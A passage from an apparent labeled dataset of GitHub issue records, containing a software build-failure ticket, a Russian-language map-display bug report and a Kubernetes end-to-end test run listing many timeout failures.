"description": "I'm trying to build the offline-software metaproject (trunk) on my computer (Ubuntu 16.04),but the compilation fails with this error (I'll attach the full output of cmake and make to this ticket):\n{{{\ncollect2: error: ld returned 1 exit status\ndataio/CMakeFiles/dataio-shovel.dir/build.make:193: recipe for target 'bin/dataio-shovel' failed\nmake[2]: *** [bin/dataio-shovel] Error 1\nCMakeFiles/Makefile2:1877: recipe for target 'dataio/CMakeFiles/dataio-shovel.dir/all' failed\nmake[1]: *** [dataio/CMakeFiles/dataio-shovel.dir/all] Error 2\nMakefile:127: recipe for target 'all' failed\nmake: *** [all] Error 2\n}}}\n",
"reporter": "thomas.kittler",
"cc": "",
"resolution": "fixed",
"_ts": "1485884473138334",
"component": "combo core",
"summary": "offline-software trunk fails to build",
"priority": "blocker",
"keywords": "",
"time": "2017-01-27T16:41:09",
"milestone": "",
"owner": "",
"type": "defect"
}
```
|
1.0
|
offline-software trunk fails to build (Trac #1943) - Migrated from https://code.icecube.wisc.edu/ticket/1943
```json
{
"status": "closed",
"changetime": "2017-01-31T17:41:13",
"description": "I'm trying to build the offline-software metaproject (trunk) on my computer (Ubuntu 16.04),but the compilation fails with this error (I'll attach the full output of cmake and make to this ticket):\n{{{\ncollect2: error: ld returned 1 exit status\ndataio/CMakeFiles/dataio-shovel.dir/build.make:193: recipe for target 'bin/dataio-shovel' failed\nmake[2]: *** [bin/dataio-shovel] Error 1\nCMakeFiles/Makefile2:1877: recipe for target 'dataio/CMakeFiles/dataio-shovel.dir/all' failed\nmake[1]: *** [dataio/CMakeFiles/dataio-shovel.dir/all] Error 2\nMakefile:127: recipe for target 'all' failed\nmake: *** [all] Error 2\n}}}\n",
"reporter": "thomas.kittler",
"cc": "",
"resolution": "fixed",
"_ts": "1485884473138334",
"component": "combo core",
"summary": "offline-software trunk fails to build",
"priority": "blocker",
"keywords": "",
"time": "2017-01-27T16:41:09",
"milestone": "",
"owner": "",
"type": "defect"
}
```
|
defect
|
offline software trunk fails to build trac migrated from json status closed changetime description i m trying to build the offline software metaproject trunk on my computer ubuntu but the compilation fails with this error i ll attach the full output of cmake and make to this ticket n error ld returned exit status ndataio cmakefiles dataio shovel dir build make recipe for target bin dataio shovel failed nmake error ncmakefiles recipe for target dataio cmakefiles dataio shovel dir all failed nmake error nmakefile recipe for target all failed nmake error n n reporter thomas kittler cc resolution fixed ts component combo core summary offline software trunk fails to build priority blocker keywords time milestone owner type defect
| 1
|
23,058
| 3,755,593,311
|
IssuesEvent
|
2016-03-12 19:27:57
|
RomanGolovanov/aMetro
|
https://api.github.com/repos/RomanGolovanov/aMetro
|
closed
|
Отображать на карте фоновые картинки или замещающие (если они есть)
|
auto-migrated Component-UI Priority-Low Type-Defect
|
```
Например, Казань, или Чили: Сантьяго. Во
втором варианте линии не
отображаются, отображается только
картинка (параметр IsVector=0). Линии
начинают отображаться только в машрутах
```
Original issue reported on code.google.com by `G.Glaur...@gmail.com` on 30 Jan 2010 at 9:11
|
1.0
|
Отображать на карте фоновые картинки или замещающие (если они есть) - ```
Например, Казань, или Чили: Сантьяго. Во
втором варианте линии не
отображаются, отображается только
картинка (параметр IsVector=0). Линии
начинают отображаться только в машрутах
```
Original issue reported on code.google.com by `G.Glaur...@gmail.com` on 30 Jan 2010 at 9:11
|
defect
|
отображать на карте фоновые картинки или замещающие если они есть например казань или чили сантьяго во втором варианте линии не отображаются отображается только картинка параметр isvector линии начинают отображаться только в машрутах original issue reported on code google com by g glaur gmail com on jan at
| 1
|
29,361
| 4,494,722,763
|
IssuesEvent
|
2016-08-31 07:33:44
|
kubernetes/kubernetes
|
https://api.github.com/repos/kubernetes/kubernetes
|
opened
|
kubernetes-e2e-gce-serial: broken test run
|
kind/flake priority/P2 team/test-infra
|
https://k8s-gubernator.appspot.com/build/kubernetes-jenkins/logs/kubernetes-e2e-gce-serial/2050/
Multiple broken tests:
Failed: [k8s.io] SchedulerPredicates [Serial] validates that NodeAffinity is respected if not matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #28019
Failed: [k8s.io] SchedulerPredicates [Serial] validates that embedding the JSON PodAffinity and PodAntiAffinity setting as a string in the annotation value work {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Daemon set [Serial] should run and stop complex daemon with node affinity {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30441
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPodAntiAffinity is respected if matching 2 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30078 #30142
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] Deployment Should scale from 5 pods to 3 pods and from 3 to 1 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27406 #27669 #29770
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Network when a node becomes unreachable All pods on the unreachable node should be marked as NotReady upon the node turn NotReady AND all pods should be mark back to Ready when the node get back to Ready before pod eviction timeout {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30187
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPod Affinity and AntiAffinity is respected if matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPodAffinity is respected if matching with multiple Affinities {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Namespaces [Serial] should ensure that all pods are removed when a namespace is deleted. {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] DaemonRestart [Disruptive] Controller Manager should not create/delete replicas across restart {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] DaemonRestart [Disruptive] Kubelet should not restart containers across restart {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27502 #28722
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] Deployment Should scale from 1 pod to 3 pods and from 3 to 5 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30317 #31591
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Network when a node becomes unreachable [replication controller] recreates pods scheduled on the unreachable node AND allows scheduling of pods on a node after it rejoins the cluster {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27324
Failed: [k8s.io] Etcd failure [Disruptive] should recover from SIGKILL {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #29444
Failed: [k8s.io] Kubelet [Serial] [Slow] [k8s.io] regular resource usage tracking resource tracking for 0 pods per node {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #26784 #28384
Failed: [k8s.io] SchedulerPredicates [Serial] validates that a pod with an invalid podAffinity is rejected because of the LabelSelectorRequirement is invalid {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Kubelet [Serial] [Slow] [k8s.io] regular resource usage tracking resource tracking for 100 pods per node {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:132
Aug 30 21:34:54.277: All nodes should be ready after test, Get https://104.197.14.98/api/v1/nodes: dial tcp 104.197.14.98:443: i/o timeout
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:408
```
Issues about this test specifically: #26982
Failed: [k8s.io] Etcd failure [Disruptive] should recover from network partition with master {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #29512
Failed: [k8s.io] Rescheduler [Serial] should ensure that critical pod is scheduled in case there is no resources available {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #31277 #31347 #31710
Failed: [k8s.io] SchedulerPredicates [Serial] validates that Inter-pod-Affinity is respected if not matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Resize [Slow] should be able to add nodes {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27470 #30156
Failed: [k8s.io] Daemon set [Serial] should run and stop complex daemon {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run [Conformance] {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27115 #28070 #30747 #31341
Failed: [k8s.io] Restart [Disruptive] should restart all nodes and ensure all nodes and pods recover {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #26744 #26929
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] ReplicationController Should scale from 1 pod to 3 pods and from 3 to 5 and verify decision stability {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27479 #27675 #28097 #30571
Previous issues for this suite: #26743 #27118 #27320
|
1.0
|
kubernetes-e2e-gce-serial: broken test run - https://k8s-gubernator.appspot.com/build/kubernetes-jenkins/logs/kubernetes-e2e-gce-serial/2050/
Multiple broken tests:
Failed: [k8s.io] SchedulerPredicates [Serial] validates that NodeAffinity is respected if not matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #28019
Failed: [k8s.io] SchedulerPredicates [Serial] validates that embedding the JSON PodAffinity and PodAntiAffinity setting as a string in the annotation value work {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Daemon set [Serial] should run and stop complex daemon with node affinity {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30441
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPodAntiAffinity is respected if matching 2 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30078 #30142
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] Deployment Should scale from 5 pods to 3 pods and from 3 to 1 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27406 #27669 #29770
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Network when a node becomes unreachable All pods on the unreachable node should be marked as NotReady upon the node turn NotReady AND all pods should be mark back to Ready when the node get back to Ready before pod eviction timeout {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30187
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPod Affinity and AntiAffinity is respected if matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPodAffinity is respected if matching with multiple Affinities {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Namespaces [Serial] should ensure that all pods are removed when a namespace is deleted. {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] DaemonRestart [Disruptive] Controller Manager should not create/delete replicas across restart {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] DaemonRestart [Disruptive] Kubelet should not restart containers across restart {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27502 #28722
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] Deployment Should scale from 1 pod to 3 pods and from 3 to 5 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30317 #31591
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Network when a node becomes unreachable [replication controller] recreates pods scheduled on the unreachable node AND allows scheduling of pods on a node after it rejoins the cluster {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27324
Failed: [k8s.io] Etcd failure [Disruptive] should recover from SIGKILL {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #29444
Failed: [k8s.io] Kubelet [Serial] [Slow] [k8s.io] regular resource usage tracking resource tracking for 0 pods per node {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #26784 #28384
Failed: [k8s.io] SchedulerPredicates [Serial] validates that a pod with an invalid podAffinity is rejected because of the LabelSelectorRequirement is invalid {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Kubelet [Serial] [Slow] [k8s.io] regular resource usage tracking resource tracking for 100 pods per node {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:132
Aug 30 21:34:54.277: All nodes should be ready after test, Get https://104.197.14.98/api/v1/nodes: dial tcp 104.197.14.98:443: i/o timeout
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:408
```
Issues about this test specifically: #26982
Failed: [k8s.io] Etcd failure [Disruptive] should recover from network partition with master {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #29512
Failed: [k8s.io] Rescheduler [Serial] should ensure that critical pod is scheduled in case there is no resources available {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #31277 #31347 #31710
Failed: [k8s.io] SchedulerPredicates [Serial] validates that Inter-pod-Affinity is respected if not matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Resize [Slow] should be able to add nodes {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27470 #30156
Failed: [k8s.io] Daemon set [Serial] should run and stop complex daemon {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run [Conformance] {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27115 #28070 #30747 #31341
Failed: [k8s.io] Restart [Disruptive] should restart all nodes and ensure all nodes and pods recover {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #26744 #26929
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] ReplicationController Should scale from 1 pod to 3 pods and from 3 to 5 and verify decision stability {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
